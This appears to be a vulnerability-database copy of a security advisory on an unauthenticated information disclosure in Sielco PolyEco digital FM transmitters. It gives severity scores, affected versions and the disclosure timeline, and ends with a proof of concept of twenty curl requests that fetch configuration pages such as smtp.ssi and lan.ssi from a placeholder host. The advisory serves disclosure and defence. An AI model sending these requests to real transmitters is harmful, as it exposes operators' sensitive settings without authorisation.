Lucene search

K
zeroscienceGjoko KrsticZSL-2023-5766
HistoryApr 10, 2023 - 12:00 a.m.

Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure

2023-04-1000:00:00
Gjoko Krstic
zeroscience.mk
175
sielco
polyeco
vulnerability disclosure
information disclosure
unauthenticated access
access control
sensitive information
remote exploitation
affected versions
vendor response

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.6

Confidence

High

EPSS

0.002

Percentile

53.4%

Title: Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure
Advisory ID: ZSL-2023-5766
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 10.04.2023

Summary

PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000).

All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, “FFT” spectral analysis of the audio sources, SFN synchronization and much more.

Description

Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19

Tested On

lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[09.04.2023] No response from the vendor.
[09.04.2023] No response from the CSIRT team.
[10.04.2023] Public security advisory released.

PoC

sielco_polyeco_info.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/51370&gt;
[2] <https://packetstormsecurity.com/files/171859/&gt;
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253064&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269701&gt;
[5] <https://nvd.nist.gov/vuln/detail/CVE-2023-46662&gt;
[6] <https://www.tenable.com/cve/CVE-2023-46662&gt;
[7] <https://vulners.com/cve/CVE-2023-46662&gt;
[8] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-07&gt;

Changelog

[10.04.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).

All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.

Desc: Sielco PolyEco is affected by an information disclosure
vulnerability due to improper access control enforcement. An
unauthenticated remote attacker can exploit this, via a specially
crafted request to gain access to sensitive information.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php


26.01.2023

--


$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi
</p></body></html>

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.6

Confidence

High

EPSS

0.002

Percentile

53.4%

Related for ZSL-2023-5766